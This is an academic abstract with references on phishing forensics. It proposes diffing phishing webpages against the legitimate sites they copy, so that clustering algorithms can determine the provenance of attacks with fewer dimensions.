Phishing webpages present a previously underused resource for information on determining provenance of phishing attacks.Phishing webpages aim to impersonate a legitimate website in order to trick their potential victims into revealing their confidential data, such as usernames and passwords.However different phishing webpages often contain small differences and these differences can provide a great deal of evidence on the provenance of phishing attacks.When impersonating a webpage, there is often a large amount of `redundant' information, as much of the original, impersonated website is found in phishing websites, making phishing websites across different attacks very similar.In order to attempt to overcome this issue, a diff can be used which takes the phishing and original websites as input and returns the differences between the two.These differences present a new view on the data that is previously unused and presents a novel way to increase the ability of clustering algorithms to find good, distinct and separated clusters within the data.The research presented here outlines this diff process and shows that for the data used, comparable results were obtained while the dimensionality of the dataset was reduced.This reduction in size allows for clustering algorithms to complete faster, due to the reduced dimensionality of the dataset.
[1]
Felix C. Freiling,et al.
Measuring and Detecting Fast-Flux Service Networks
,
2008,
NDSS.
[2]
R. Clarke.
A Hidden Challenge to the Regulation of Data Surveillance
,
2003
.
[3]
Alex Ng,et al.
Forensic Characteristics of Phishing - Petty Theft or Organized Crime?
,
2008,
WEBIST.
[4]
Paul A. Watters,et al.
Determining provenance in phishing websites using automated conceptual analysis
,
2009,
2009 eCrime Researchers Summit.
[5]
Walter F. Tichy,et al.
Delta algorithms: an empirical analysis
,
1998,
TSEM.
[6]
Jonathan Goldstein,et al.
When Is ''Nearest Neighbor'' Meaningful?
,
1999,
ICDT.
[7]
J. W. Hunt,et al.
An Algorithm for Differential File Comparison
,
2008
.
[8]
Cormac Herley,et al.
A profitless endeavor: phishing as tragedy of the commons
,
2009,
NSPW '08.